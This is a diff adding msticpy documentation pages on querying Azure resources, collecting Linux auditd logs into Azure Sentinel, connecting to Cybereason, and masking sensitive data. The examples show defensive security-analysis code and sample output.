+          <th>Subscription ID</th>
+          <th>Display Name</th>
+          <th>State</th>
+        </tr>
+      </thead>
+      <tbody>
+        <tr>
+          <td>0</td>
+          <td>c690adc4-ec82-41fa-ad36-80f3c8899bd0</td>
+          <td>Visual Studio Enterprise</td>
+          <td>SubscriptionState.enabled</td>
+        </tr>
+      </tbody>
+    </table>
+    </div>
+
+|
+
+See :py:meth:`get_subscription_info <msticpy.data.azure_data.AzureData.get_subscription_info>`
+
+AZURE_DATA_CONNECTOR.get_subscription_info() gets information on a
+specific subscription ID.
+
+
+.. code:: ipython3
+
+    az.get_subscription_info("c690adc4-ec82-41fa-ad36-80f3c8899bd0")
+
+
+.. parsed-literal::
+
+    {'Subscription ID': 'c690adc4-ec82-41fa-ad36-80f3c8899bd0',
+     'Display Name': 'Visual Studio Enterprise',
+     'State': 'SubscriptionState.enabled',
+     'Subscription Location Limits': 'Public_2014-09-01',
+     'Subscription Quota': 'MSDN_2014-09-01',
+     'Spending Limit': <SpendingLimit.on: 'On'>}
+
+Get Azure Resource Details
+--------------------------
+
+See :py:meth:`get_resources <msticpy.data.azure_data.AzureData.get_resources>`
+
+As well as subscriptions we can return details on a specific Azure
+resource.
+AZURE_DATA_CONNECTOR.get_resources() returns a pandas DataFrame with
+details on all resources within a Subscription or Resource Group.
+In addition, you can request full properties on each Resource with the
+get_props = True parameter. However, this can take some time to return
+results.
+
+.. code:: ipython3
+
+    resources = az.get_resources(sub_id="bca22c36-a158-44ff-8cbb-23fa92236a55")
+    resources.head()
+
+
++---+----------------------------------------------------+----------------------------------------------------+------------------------------------+-------------+---------------------------------------------+-------+-------------+----------+----------------------------------------------------+----------------------------------------------------+-----------+
+|   | resource_id                                        | name                                               | resource_type                      | location    | tags                                        | plan  | properties  | kind     | managed_by                                         | sku                                                | identity  |
++===+====================================================+====================================================+====================================+=============+=============================================+=======+=============+==========+====================================================+====================================================+===========+
+| 0 | /subscriptions/3b701f84-d04b-4479-89b1-fa8827e...  | cloud-shell-storage-westeurope-vnet                | Microsoft.Network/virtualNetworks  | centralus   | {}                                          | None  | None        | None     | None                                               | None                                               | None      |
++---+----------------------------------------------------+----------------------------------------------------+------------------------------------+-------------+---------------------------------------------+-------+-------------+----------+----------------------------------------------------+----------------------------------------------------+-----------+
+| 1 | /subscriptions/3b701f84-d04b-4479-89b1-fa8827e...  | csb3b701f84d04bx4479x89b                           | Microsoft.Storage/storageAccounts  | westeurope  | {'ms-resource-usage': 'azure-cloud-shell'}  | None  | None        | Storage  | None                                               | {'additional_properties': {}, 'name': 'Standar...  | None      |
++---+----------------------------------------------------+----------------------------------------------------+------------------------------------+-------------+---------------------------------------------+-------+-------------+----------+----------------------------------------------------+----------------------------------------------------+-----------+
+| 2 | /subscriptions/3b701f84-d04b-4479-89b1-fa8827e...  | bluepot-01_OsDisk_1_ad7a7c0383444f02830ba46418...  | Microsoft.Compute/disks            | westus      | None                                        | None  | None        | None     | /subscriptions/3b701f84-d04b-4479-89b1-fa8827e...  | None                                               | None      |
++---+----------------------------------------------------+----------------------------------------------------+------------------------------------+-------------+---------------------------------------------+-------+-------------+----------+----------------------------------------------------+----------------------------------------------------+-----------+
+| 3 | /subscriptions/3b701f84-d04b-4479-89b1-fa8827e...  | bluepot-02_OsDisk_1_dce988e082e54617ae3622eca0...  | Microsoft.Compute/disks            | westus      | None                                        | None  | None        | None     | /subscriptions/3b701f84-d04b-4479-89b1-fa8827e...  | None                                               | None      |
++---+----------------------------------------------------+----------------------------------------------------+------------------------------------+-------------+---------------------------------------------+-------+-------------+----------+----------------------------------------------------+----------------------------------------------------+-----------+
+| 4 | /subscriptions/3b701f84-d04b-4479-89b1-fa8827e...  | CentOS-Test_OsDisk_1_7ee38d36b893481e8a68405c0...  | Microsoft.Compute/disks            | westus      | None                                        | None  | None        | None     | /subscriptions/3b701f84-d04b-4479-89b1-fa8827e...  | {'additional_properties': {}, 'name': 'Premium...  | None      |
++---+----------------------------------------------------+----------------------------------------------------+------------------------------------+-------------+---------------------------------------------+-------+-------------+----------+----------------------------------------------------+----------------------------------------------------+-----------+
+
+
+See :py:meth:`get_resource_details<msticpy.data.azure_data.AzureData.get_resource_details>`
+
+You can return full details on a single resource with AZURE_DATA_CONNECTOR.get_resource_details() and passing a Resource ID.
+
+
+.. code:: ipython3
+
+    az.get_resource_details(resource_id="/subscriptions/bca22c36-a158-44ff-8cbb-23fa92236a55/resourceGroups/Contoso/providers/Microsoft.Compute/virtualMachines/UbuntuDevEnv")
+
+
+
+
+.. parsed-literal::
+
+    {'resource_id': '/subscriptions/bca22c36-a158-44ff-8cbb-23fa92236a55/resourceGroups/Contoso/providers/Microsoft.Compute/virtualMachines/UbuntuDevEnv',
+     'name': 'UbuntuDevEnv',
+     'resource_type': 'Microsoft.Compute/virtualMachines',
+     'location': 'northeurope',
+     'tags': {},
+     'plan': None,
+     'properties': {'vmId': 'f557c9da-309f-4ab9-93ec-b29d7c21be87',
+      'hardwareProfile': {'vmSize': 'Standard_B1s'},
+      'storageProfile': {'imageReference': {'publisher': 'Canonical',
+        'offer': 'UbuntuServer',
+        'sku': '18.04-LTS',
+        'version': 'latest',
+        'exactVersion': '18.04.201812040'},
+       'osDisk': {'osType': 'Linux',
+        'name': 'UbuntuDevEnv_OsDisk_1_fc3690fe9f2248a1b441c0a1616833c5',
+        'createOption': 'FromImage',
+        'caching': 'ReadWrite',
+        'managedDisk': {'id': '/subscriptions/bca22c36-a158-44ff-8cbb-23fa92236a55/resourceGroups/CONTOSO/providers/Microsoft.Compute/disks/UbuntuDevEnv_OsDisk_1_fc3690fe9f2248a1b441c0a1616833c5'}},
+       'dataDisks': [{'lun': 0,
+         'name': 'UbuntuDevEnv_DataDisk_0',
+         'createOption': 'Attach',
+         'caching': 'None',
+         'writeAcceleratorEnabled': False,
+         'managedDisk': {'id': '/subscriptions/bca22c36-a158-44ff-8cbb-23fa92236a55/resourceGroups/Contoso/providers/Microsoft.Compute/disks/UbuntuDevEnv_DataDisk_0'},
+         'toBeDetached': False}]},
+      'osProfile': {'computerName': 'UbuntuDevEnv',
+       'adminUsername': 'user',
+       'linuxConfiguration': {'disablePasswordAuthentication': True,
+        'ssh': {'publicKeys': [{'path': '/home/user/.ssh/authorized_keys',
+           'keyData': ''}]},
+        'provisionVMAgent': True},
+       'secrets': [],
+       'allowExtensionOperations': True},
+      'networkProfile': {'networkInterfaces': [{'id': '/subscriptions/bca22c36-a158-44ff-8cbb-23fa92236a55/resourceGroups/Contoso/providers/Microsoft.Network/networkInterfaces/ubuntudevenv3'}]},
+      'provisioningState': 'Succeeded'},
+     'kind': None,
+     'managed_by': None,
+     'sku': None,
+     'identity': None}
+
+
+.. note:: You can also provide a dictionary of resource details if you
+          don't have a complete Resource ID.
+          The details dictionary must contain:
+          * resource_group_name
+          * resource_provider_namespace
+          * parent_resource_path (if there isn't one leave as a empty string).
+          * resource_type
+          * resource_name
+
+.. code:: ipython3
+
+    resource_details = {"resource_group_name":"Contoso",
+                       "resource_provider_namespace":"Microsoft.Compute",
+                       "parent_resource_path":"",
+                       "resource_type":"virtualMachines",
+                       "resource_name":"UbuntuDevEnv"}
+    az.get_resource_details(resource_details=resource_details)
+
+
+
+
+.. parsed-literal::
+
+    {'resource_id': '/subscriptions/bca22c36-a158-44ff-8cbb-23fa92236a55/resourceGroups/Contoso/providers/Microsoft.Compute/virtualMachines/UbuntuDevEnv',
+     'name': 'UbuntuDevEnv',
+     'resource_type': 'Microsoft.Compute/virtualMachines',
+     'location': 'northeurope',
+     'tags': {},
+     'plan': None,
+     'properties': {'vmId': 'f557c9da-309f-4ab9-93ec-b29d7c21be87',
+      'hardwareProfile': {'vmSize': 'Standard_B1s'},
+      'storageProfile': {'imageReference': {'publisher': 'Canonical',
+        'offer': 'UbuntuServer',
+        'sku': '18.04-LTS',
+        'version': 'latest',
+        'exactVersion': '18.04.201812040'},
+       'osDisk': {'osType': 'Linux',
+        'name': 'UbuntuDevEnv_OsDisk_1_fc3690fe9f2248a1b441c0a1616833c5',
+        'createOption': 'FromImage',
+        'caching': 'ReadWrite',
+        'managedDisk': {'id': '/subscriptions/bca22c36-a158-44ff-8cbb-23fa92236a55/resourceGroups/CONTOSO/providers/Microsoft.Compute/disks/UbuntuDevEnv_OsDisk_1_fc3690fe9f2248a1b441c0a1616833c5'}},
+       'dataDisks': [{'lun': 0,
+         'name': 'UbuntuDevEnv_DataDisk_0',
+         'createOption': 'Attach',
+         'caching': 'None',
+         'writeAcceleratorEnabled': False,
+         'managedDisk': {'id': '/subscriptions/bca22c36-a158-44ff-8cbb-23fa92236a55/resourceGroups/Contoso/providers/Microsoft.Compute/disks/UbuntuDevEnv_DataDisk_0'},
+         'toBeDetached': False}]},
+      'osProfile': {'computerName': 'UbuntuDevEnv',
+       'adminUsername': 'user',
+       'linuxConfiguration': {'disablePasswordAuthentication': True,
+        'ssh': {'publicKeys': [{'path': '/home/user/.ssh/authorized_keys',
+           'keyData': ''}]},
+        'provisionVMAgent': True},
+       'secrets': [],
+       'allowExtensionOperations': True},
+      'networkProfile': {'networkInterfaces': [{'id': '/subscriptions/bca22c36-a158-44ff-8cbb-23fa92236a55/resourceGroups/Contoso/providers/Microsoft.Network/networkInterfaces/ubuntudevenv3'}]},
+      'provisioningState': 'Succeeded'},
+     'kind': None,
+     'managed_by': None,
+     'sku': None,
+     'identity': None}
+
+
+Get Azure Network Details
+-------------------------
+
+See :py:meth:`get_network_details <msticpy.data.azure_data.AzureData.get_network_details>`
+
+If your Azure resources has a network interface associated with it (for example a VM) you can return details on the
+interface as associated Network Security Group (NSG). Calling this function is very similar to getting resource details
+however instead of passing it a resource ID you provide the network interface ID for the network device you want details
+for.
+
+.. code:: ipython3
+
+    az.get_network_details(networkID=NETWORK_INTERFACE_ID, sub_id=SUBSCRIPTION_ID)
+
+.. note:: If youa are looking for a VM network interface ID you can use get_resource_details to get details on the VM.
+    The network interface will be under properties > networkProfile > networkInterfaces > id
+
+This will return a DataFrame containing details of all IP addresses and subnets associated with the network interface.
+
+
+Get Azure Metrics
+-----------------
+
+See :py:meth:`get_metrics <msticpy.data.azure_data.AzureData.get_metrics>`
+
+Azure provides a range of metrics for resources. The types of metrics available depends on the Azure resource in question,
+a full list of metrics can be found `here <https://docs.microsoft.com/azure/azure-monitor/platform/metrics-supported>`__.
+
+You can return all of these metrics with get_metrics.
+
+In order to call this function you need to provide the metrics you want to retrieve in a comma separated string
+e.g. ""Percentage CPU,Disk Read Bytes,Disk Write Bytes", along with the resource ID of the item you wish to retrieve
+the metrics for, and the subscription ID that resource is part of. You can also choose to get the metrics sampled
+at either the minute or the hour interval, and for how many days preceding you want metrics for. By default the
+function returns hourly metrics for the last 30 days.
+
+.. code:: ipython3
+
+    az.get_metrics(metrics="Percentage CPU", resource_id=resource_details['resource_id'], sub_id=sub_details['Subscription ID'], sample_time="hour", start_time=15)
+
+This returns a dictionary of items with the metric name as they key and a DataFrame of the metrics as the value.
+
+.. note:: get_metrics is resource specific, so if you want to get metrics from more than one resource you will need
+    separate function calls.
\ No newline at end of file
diff --git a/docs/source/data_acquisition/CollectingLinuxAuditLogs.rst b/docs/source/data_acquisition/CollectingLinuxAuditLogs.rst
new file mode 100644
index 000000000..8cacd574b
--- /dev/null
+++ b/docs/source/data_acquisition/CollectingLinuxAuditLogs.rst
@@ -0,0 +1,195 @@
+Setting up Process Auditing for Linux in Azure Sentinel
+=======================================================
+
+This is a provisional set of instructions for the preview release of
+Azure Sentinel.
+
+Add your Linux VMs to the Log Analytics Workspace
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+Browse to the Log Analytics blade for your workspace and
+select the option to configure your Azure virtual machines.
+
+.. figure:: _static/lxaudit-GettingStarted.png
+   :alt: Connect a data source
+   :width: 3.23000in
+   :height: 2.39000in
+
+This brings up a list of Virtual machines which you can connect and
+disconnect from Log Analytics. Click on the *Connect* icon to add the
+Log Analytics data collection agent.
+
+.. figure:: _static/lxaudit-SelectVM.png
+   :alt: Connect a VM to Log Analytics
+   :width: 5.83333in
+   :height: 2.13365in
+
+Configure Auditing on your Linux VMs
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+Follow the instructions at `Configuring and auditing Linux systems with
+Audit
+daemon <https://linux-audit.com/configuring-and-auditing-linux-systems-with-audit-daemon/>`__
+
+Add audit filter rules to capture successful process executions
+
+::
+
+    $ sudo auditctl -a always,exit -F arch=b32 -S execve,execveat
+    $ sudo auditctl -a always,exit -F arch=b64 -S execve,execveat
+
+Your rules should look something like this when added
+
+::
+
+    $ sudo auditctl -l
+    -w /bin/kmod -p x -k kernelmodules
+    -w /var/log/audit -p wxa -k audittampering
+    -w /etc/audit -p wxa -k audittampering
+    -w /etc/passwd -p wxa -k usergroup
+    -w /etc/group -p wxa -k usergroup
+    -w /etc/pam.d -p wxa -k pam
+    -a always,exit -F arch=b32 -S execve,execveat
+    -a always,exit -F arch=b64 -S execve,execveat
+
+See Scott Pack's blog `auditd By Example - Monitoring Process
+Execution <https://secopsmonkey.com/monitoring-process-execution-with-auditd.html>`__
+
+After a few minutes (or hours depending on how busy your hosts are),
+save a sample from your audit log. A few hundred lines is probably
+enough.
+
+::
+
+    $ sudo tail -500 /var/log/audit/audit.log > ~/auditsample.txt
+
+You will need to copy this file to whereever you run the next step from.
+
+Add Auditd as a Custom log in Log Analytics
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+Go back to your Log Analytics configuration blade and choose
+the "Windows, Linux and other sources" option.
+
+.. figure:: _static/lxaudit-ConnectSources.png
+   :alt: Connect a custom source
+   :width: 3.23958in
+   :height: 2.40000in
+
+Now add a custom log type.
+
+.. figure:: _static/lxaudit-CustomLog.png
+   :alt: Create a custom log definition
+   :width: 5.83333in
+   :height: 2.63390in
+
+Click the *Add+* button and follow the steps
+
+1. Upload your audit log sample
+
+2. Select New Line as the record delimiter
+
+3. Add the path to the audit log (select Linux as the type)
+   ``/var/log/audit/audit.log``
+
+4. Add a name (e.g. *Auditlog\_CL*) and description
+
+In a while (logs are harvested every hour) you should see a log in
+Custom Logs showing up in Log Analytics.
+
+
+.. figure:: _static/lxaudit-AzureSentinelTable.png
+   :alt: Audit data in Azure Sentinel table
+   :width: 6.61048in
+   :height: 2.19971in
+
+At this stage the logs are both verbose (e.g. a process creation event
+will result in 5 or more audit entries) and not always useful to a
+casual browser. Several fields are hex encoded (to prevent problems with
+embedded strings and spaces) and the timestamp of the actual event (as
+opposed to the TimeGenerated field, which records the log ingestion
+time) is a Unix timestamp (number of seconds since 1/1/1970). You can
+use audit tools such as *aureport* to decode and make sense of the logs.
+
+The *msticpy* library contains a module to decode and reorganize auditd
+logs from Log Analytics.
+
+Reading Audit Data from Log Analytics
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+We can do part of the work using Kusto query language (KQL). This
+example uses a Kql query executed by KqlMagic in Python.
+
+.. code-block:: Python
+    :linenos:
+
+    linux_events = r'''
+    AuditLog_CL
+    | where Computer has '{hostname}'
+    | where TimeGenerated >= datetime({start})
+    | where TimeGenerated <= datetime({end})
+    | extend mssg_parts = extract_all(@"type=(?P<type>[^\s]+)\s+msg=audit\((?P<mssg_id>[^)]+)\):\s+(?P<mssg>[^\r]+)\r?",
+        dynamic(['type', 'mssg_id', 'mssg']), RawData)
+    | extend mssg_type = tostring(mssg_parts[0][0]), mssg_id = tostring(mssg_parts[0][1])
+    | project TenantId, TimeGenerated, Computer, mssg_type, mssg_id, mssg_parts
+    | extend mssg_content = split(mssg_parts[0][2],' ')
+    | extend typed_mssg = pack(mssg_type, mssg_content)
+    | summarize AuditdMessage = makelist(typed_mssg) by TenantId,
+        TimeGenerated, Computer, mssg_id
+    '''.format(start=host1_q_times.start, end=host1_q_times.end,
+            hostname=security_alert.hostname)
+    print('getting data...')
+    %kql -query linux_events
+    linux_events_df = _kql_raw_result_.to_dataframe()
+    print(f'{len(linux_events_df)} raw auditd mssgs downloaded')
+
+An explanation of some more involved lines of the query:
+
+- lines 6-8: Split the rawdata field into message type, message Id
+  and timestamp and message data fields
+- line 9: get rid of unwanted columns
+- line 10: split the message body into an array of key=value strings
+- line 11: pack the message type and list of contents into a
+  dictionary {'Type': [k1=v1, k2=v2...]}
+- line 12-13: group by messageId and pack the individual typed_mssg
+  dictionaries into a list of dictionaries
+
+The processing library is used as follows. Note with large data
+sets this can take some time to process.
+
+::
+
+    from msticpy.sectools.auditdextract import extract_events_to_df, get_event_subset
+    linux_events_all = extract_events_to_df(linux_events_df, verbose=True)
+
+The call to ``extract_events_to_df()`` does the following:
+
+- splits the ``key=value`` string
+- hex decoding of any encoded strings
+- type conversion for int fields
+- for SYSCALL/EXECVE rows, some extract processing to identify
+  the executable that ran and re-assemble the commandline arguments
+- extracts the real timestamp and replacing the original TimeGenerated
+  columns (since this was just the log import time, not the event time,
+  which is what we are after)
+
+This example splits out Process call and Login events into two
+separate data streams:
+
+::
+
+    lx_proc_create = get_event_subset(linux_events_all,'SYSCALL_EXECVE')
+    print(f'{len(lx_proc_create)} Process Create Events')
+
+    lx_login = (get_event_subset(linux_events_all, 'LOGIN')
+            .merge(get_event_subset(linux_events_all, 'CRED_ACQ'),
+                how='inner',
+                left_on=['old-ses', 'pid', 'uid'],
+                right_on=['ses', 'pid', 'uid'],
+                suffixes=('', '_cred')).drop(['old-ses','TenantId_cred',
+                                                'Computer_cred'], axis=1)
+            .dropna(axis=1, how='all'))
+    print(f'{len(lx_login)} Login Events')
+
+You can also use the auditdextract module to extract raw text logs.
+See the module help for more information.
diff --git a/docs/source/data_acquisition/CybereasonProvider.rst b/docs/source/data_acquisition/CybereasonProvider.rst
new file mode 100644
index 000000000..34ad30540
--- /dev/null
+++ b/docs/source/data_acquisition/CybereasonProvider.rst
@@ -0,0 +1,435 @@
+Splunk - Data Connector
+=======================
+
+Description
+-----------
+
+The data provider module of msticpy provides functions to allow for the
+defining of data sources, connectors to them and queries for them as
+well as the ability to return query result from the defined data
+sources.
+
+For more information on Data Providers, check the documentation :doc:`DataProviders`
+
+In this notebooks we will demonstrate Cybereason data connector feature of
+msticpy.
+
+Authentication
+~~~~~~~~~~~~~~
+
+Authentication for the Cybereason data provider is handled by specifying
+credentials directly in the connect call or specifying the credentials
+in msticpy config file.
+
+For more information on how to create new user with approapriate roles
+and permissions, follow the product documentation:
+`User Roles and Permissions <https://nest.cybereason.com/documentation/product-documentation/181/manage-user-roles-and-permissions>`__
+and
+`API Guide <https://nest.cybereason.com/documentation/api-documentation/all-versions/cybereason-api-guide>`__.
+
+Once you created user account with the appropriate roles, you will
+require the following details to specify while connecting:
+- TenantId = "instance". As this is a cloud-based solution, each customer has its dedicated instance. FQDN will be formatted as: "<instance>.cybereason.net" 
+- ClientId = "account" (account to connect to Cybereason instance)
+- ClientSecret = "yoursecret" (secret for the client specified in ClientId)
+
+Once you have details, you can specify it in ``msticpyconfig.yaml`` as
+shown in below example
+
+::
+
+  Cybereason:
+    Args:
+      TenantId: instance
+      ClientId: account
+      ClientSecret: yoursecret
+
+Instantiating a query provider
+------------------------------
+
+You can instantiate a data provider for Cybereason by specifying the
+credentials in connect or in msticpy config file. If the details are
+correct and authentication is successful, it will show connected.
+
+.. code:: ipython3
+
+    cybereason_prov = QueryProvider('Cybereason')
+    cybereason_prov.connect(TenantId=<instance>, ClientId=<id>, ClientSecret=<secret>)
+
+
+.. parsed-literal::
+
+    connected
+
+
+Listing available queries
+-------------------------
+
+Upon connecting to the Cybereason data environment, we can take a look what
+query options available to us by running
+``QUERY_PROVIDER.list_queries()``
+
+For more information, see
+:ref:`data_acquisition/dataproviders:getting help for a query`.
+
+This will display all the saved searches from the connected cybereason
+instance and also pre-built custom queries to do common operations such
+as list datatypes, list saved searches, alerts, audittrail informaion.
+
+.. code:: ipython3
+
+    cybereason_prov.list_queries()
+
+
+
+
+.. parsed-literal::
+
+['Connection.list_connections_from_process',
+ 'Host.find_hosts',
+ 'Process.find_process_by_commandLine',
+ 'Process.find_process_by_pid',
+ 'Process.find_process_by_suspicions']
+
+
+
+In order to get help for specific query , you can execute
+``QUERY_PROVIDER.<QueryName>?`` .
+
+For more information, see
+`Getting Help for a query <DataProviders:getting-help-for-a-query>`
+
+.. code:: ipython3
+
+    cybereason_prov.Connection.list_connections_from_process?
+
+
+.. parsed-literal::
+
+    Query:  list_connections_from_process
+    Data source:  Splunk
+    Search for process with a specific suspicion
+
+    Parameters
+    ----------
+    customFields: list (optional)
+        List of fields to output
+        (default value is: ['elementDisplayName', 'direction', 'ownerMachine', 'ownerProcess',
+          'serverPort', 'serverAddress','portType', 'aggregatedReceivedBytesCount',
+          'aggregatedTransmittedBytesCount', 'remoteAddressCountryName', 'dnsQuery',
+          'accessedByMalwareEvidence', 'domainName', 'isExternalConnection',
+          'remoteAddressInternalExternalLocal', 'calculatedCreationTime', 'endTime'
+        ])
+    end: datetime (optional)
+        Query end time
+    hostname: list
+        Hostname where the process is running
+    pid: list
+        Command to search for
+    start: datetime (optional)
+        Query start time
+        (default value is: -7)
+    timeFeatureId: str (optional)
+        Time boundary
+        (default value is: startFeatureId)
+    timefield: str (optional)
+        Field to use for time
+        (default value is: creationTime)
+
+
+If you want to print the query prior to executing, pass ‘print’ as an
+argument
+
+.. code:: ipython3
+
+    cybereason_prov.Connection.list_connections_from_process('print', hostname="hostname", pid=42)
+
+
+.. parsed-literal::
+
+    '{
+        "queryPath" : [
+            {
+                "requestedType": "Process",
+                "filters":[
+                    {
+                        "facetName": "applicablePid",
+                        "values":[ 42 ],
+                        "filterType":"Equals"
+                    },
+                    {
+                        "facetName": "ownerMachine",
+                        "values":[ "hostname" ],
+                        "filterType":"Equals"
+                    },
+                    {
+                        "facetName": "creationTime",
+                        "values": [ 1643011155594, 1643615955594 ],
+                        "filterType":"Between"
+                    }
+                ],
+                "connectionFeature": {
+                  "elementInstanceType": "Process",
+                  "featureName": "connections"
+                }
+            },
+            {
+                "requestedType": "Connection",
+                "filters":[],
+                "isResult": true
+            }
+        ],
+        "customFields": [
+          "elementDisplayName","direction","ownerMachine","ownerProcess",
+          "serverPort","serverAddress","portType","aggregatedReceivedBytesCount",
+          "aggregatedTransmittedBytesCount","remoteAddressCountryName","dnsQuery",
+          "accessedByMalwareEvidence","domainName","isExternalConnection",
+          "remoteAddressInternalExternalLocal","calculatedCreationTime","endTime"
+        ]
+      }'
+
+
+If you have set the arguments and then would like to validate the query,
+use below example
+
+.. code:: ipython3
+
+    cybereason_prov.Connection.list_connections_from_process('print',
+        hostname="hostname",
+        pid=42
+        start=-10,
+        end=-2
+    )
+
+
+
+
+.. parsed-literal::
+
+    ' {
+        "queryPath" : [
+            {
+                "requestedType": "Process",
+                "filters":[
+                    {
+                        "facetName": "applicablePid",
+                        "values":[ 42 ],
+                        "filterType":"Equals"
+                    },
+                    {
+                        "facetName": "ownerMachine",
+                        "values":[ "hostname" ],
+                        "filterType":"Equals"
+                    },
+                    {
+                        "facetName": "creationTime",
+                        "values": [ 1642752424307, 1643443624308 ],
+                        "filterType":"Between"
+                    }
+                ],
+                "connectionFeature": {
+                  "elementInstanceType": "Process",
+                  "featureName": "connections"
+                }
+            },
+            {
+                "requestedType": "Connection",
+                "filters":[],
+                "isResult": true
+            }
+        ],
+        "customFields": ["elementDisplayName","direction","ownerMachine","ownerProcess",
+          "serverPort","serverAddress","portType","aggregatedReceivedBytesCount",
+          "aggregatedTransmittedBytesCount","remoteAddressCountryName","dnsQuery",
+          "accessedByMalwareEvidence","domainName","isExternalConnection",
+          "remoteAddressInternalExternalLocal","calculatedCreationTime","endTime"
+        ]
+      }'
+
+
+
+Running pre-defined queries
+---------------------------
+
+In order to run pre-defined query , execute with the name either by
+setting values for arguments if available or run with default arguments.
+
+For more information , refer to the documentation
+:ref:`Running a pre-defined query <data_acquisition/dataproviders:running a pre-defined query>`
+
+.. code:: ipython3
+
+    cybereason_prov.Connection.list_connections_from_process('print',
+        hostname="hostname",
+        pid=42
+        start=-10,
+        end=-2
+    )
+
+
+
+
+.. raw:: html
+
+    <div>
+    <style scoped>
+        .dataframe tbody tr th:only-of-type {
+            vertical-align: middle;
+        }
+
+        .dataframe tbody tr th {
+            vertical-align: top;
+        }
+
+        .dataframe thead th {
+            text-align: right;
+        }
+    </style>
+    <table border="1" class="dataframe">
+      <thead>
+        <tr style="text-align: right;">
+          <th></th>
+          <th>remoteAddressCountryName</th>
+          <th>aggregatedReceivedBytesCount</th>
+          <th>endTime</th>
+          <th>portType</th>
+          <th>accessedByMalwareEvidence</th>
+          <th>group</th>
+          <th>elementDisplayName</th>
+          <th>aggregatedTransmittedBytesCount</th>
+          <th>isExternalConnection</th>
+          <th>serverAddress</th>
+          <th>serverPort</th>
+          <th>calculatedCreationTime</th>
+          <th>direction</th>
+          <th>ownerMachine.Machine</th>
+          <th>ownerMachine.Process</th>
+          <th>dnsQuery.DnsQueryResolvedDomainToIp</th>
+        </tr>
+      </thead>
+      <tbody>
+        <tr>
+          <th>0</th>
+          <td>France</td>
+          <td>1235</td>
+          <td>2021-12-20 07:01:21</td>
+          <td>SERVICE_HTTP</td>
+          <td>false</td>
+          <td>6d0da6b2-e909-411a-95b7-3869f9147919</td>
+          <td>10.11.12.13:53154 > 1.2.3.4:80</td>
+          <td>314</td>
+          <td>false</td>
+          <td>> 1.2.3.4</td>
+          <td>80</td>
+          <td>2021-12-20 07:01:20</td>
+          <td>OUTGOING</td>
+          <td>hostname</td>
+          <td>process.exe</td>
+          <td>external.domain.tld > 1.2.3.4</td>
+        </tr>
+      </tbody>
+    </table>
+    <p>1 row × 16 columns</p>
+    </div>
+
+
+
+Running an ad hoc Splunk query
+------------------------------
+
+You can also create your own query and run it via the Splunk
+provider using this syntax:
+``QUERY_PROVIDER.exec_query(<query_text>)``
+
+For more information, check documentation :ref:`data_acquisition/dataproviders:running an ad hoc query`
+
+.. code:: ipython3
+
+    cybereason_query = '''
+      {
+        "queryPath" : [
+          {
+            "requestedType": "Connection",
+            "filters":[],
+            "isResult": true
+          }
+        ]
+      }
+    '''
+    df = cybereason_prov.exec_query(cybereason_query)
+    df.head()
+
+
+
+.. raw:: html
+
+    <div>
+    <style scoped>
+        .dataframe tbody tr th:only-of-type {
+            vertical-align: middle;
+        }
+
+        .dataframe tbody tr th {
+            vertical-align: top;
+        }
+
+        .dataframe thead th {
+            text-align: right;
+        }
+    </style>
+    <table border="1" class="dataframe">
+      <thead>
+        <tr style="text-align: right;">
+          <th></th>
+          <th>remoteAddressCountryName</th>
+          <th>aggregatedReceivedBytesCount</th>
+          <th>endTime</th>
+          <th>portType</th>
+          <th>accessedByMalwareEvidence</th>
+          <th>group</th>
+          <th>elementDisplayName</th>
+          <th>aggregatedTransmittedBytesCount</th>
+          <th>isExternalConnection</th>
+          <th>serverAddress</th>
+          <th>serverPort</th>
+          <th>calculatedCreationTime</th>
+          <th>direction</th>
+          <th>ownerMachine.Machine</th>
+          <th>ownerMachine.Process</th>
+          <th>dnsQuery.DnsQueryResolvedDomainToIp</th>
+        </tr>
+      </thead>
+      <tbody>
+        <tr>
+          <th>0</th>
+          <td>France</td>
+          <td>1235</td>
+          <td>2021-12-20 07:01:21</td>
+          <td>SERVICE_HTTP</td>
+          <td>false</td>
+          <td>6d0da6b2-e909-411a-95b7-3869f9147919</td>
+          <td>10.11.12.13:53154 > 1.2.3.4:80</td>
+          <td>314</td>
+          <td>false</td>
+          <td>> 1.2.3.4</td>
+          <td>80</td>
+          <td>2021-12-20 07:01:20</td>
+          <td>OUTGOING</td>
+          <td>hostname</td>
+          <td>process.exe</td>
+          <td>external.domain.tld > 1.2.3.4</td>
+        </tr>
+      </tbody>
+    </table>
+    </div>
+
+|
+
+References
+----------
+
+-  `Cybereason Documentation
+   <https://nest.cybereason.com/documentation/product-documentation/202/cybereason-202-documentation>`__
+-  `Cybereason API Documentation <https://nest.cybereason.com/documentation/api-documentation/all-versions/cybereason-api-guide>`__
+-  `Cybereason Tips for the API
+   <https://nest.cybereason.com/documentation/api-documentation/all-versions/tips-using-api-documentation#tips-for-using-the-api-documentation>`__
diff --git a/docs/source/data_acquisition/DataMasking.rst b/docs/source/data_acquisition/DataMasking.rst
new file mode 100644
index 000000000..11b9d6552
--- /dev/null
+++ b/docs/source/data_acquisition/DataMasking.rst
@@ -0,0 +1,650 @@
+Data Masking Functions
+======================
+
+Sharing data, creating documents and doing public demonstrations often
+require that data containing PII or other sensitive material be
+masked.
+
+MSTICPy contains a simple library to obfuscate data using hashing and
+random mapping of values. You can use these functions on a single data
+items or entire DataFrames.
+
+.. warning:: These functions are only intended to mask data. No
+   real attempt is made to preserve the syntax and meaning of the output.
+   We recommend not trying to use an obfuscated data set as the input
+   to any analysis. Instead, perform your analysis and mask the
+   results.
+
+Import the module
+-----------------
+
+.. code:: ipython3
+
+    from msticpy.data import data_obfus
+
+See :py:mod:`data_obfus<msticpy.data.data_obfus>` for API details.
+
+
+Individual Masking Functions
+----------------------------
+
+In the examples below we’re importing individual functions from the data_obfus module
+but you can access them with the single import statement show above as
+attributes of that module.
+
+.. code:: ipython3
+
+   data_obfus.hash_string(...)
+
+
+
+hash_string
+~~~~~~~~~~~
+
+:py:func:`hash_string<msticpy.data.data_obfus.hash_string>`
+does a simple hash of the input. If the input is a numeric string it will output a numeric.
+
+
+.. parsed-literal::
+
+
+    Hash a simple string.
+
+    Parameters
+    ----------
+    input_str : str
+        The input string
+
+    Returns
+    -------
+    str
+        The masked output string
+
+
+**Examples**
+
+.. code:: ipython3
+
+    > hash_string('sensitive data')
+    jdiqcnrqmlidkd
+
+    > hash_string('42424')
+    59944
+
+
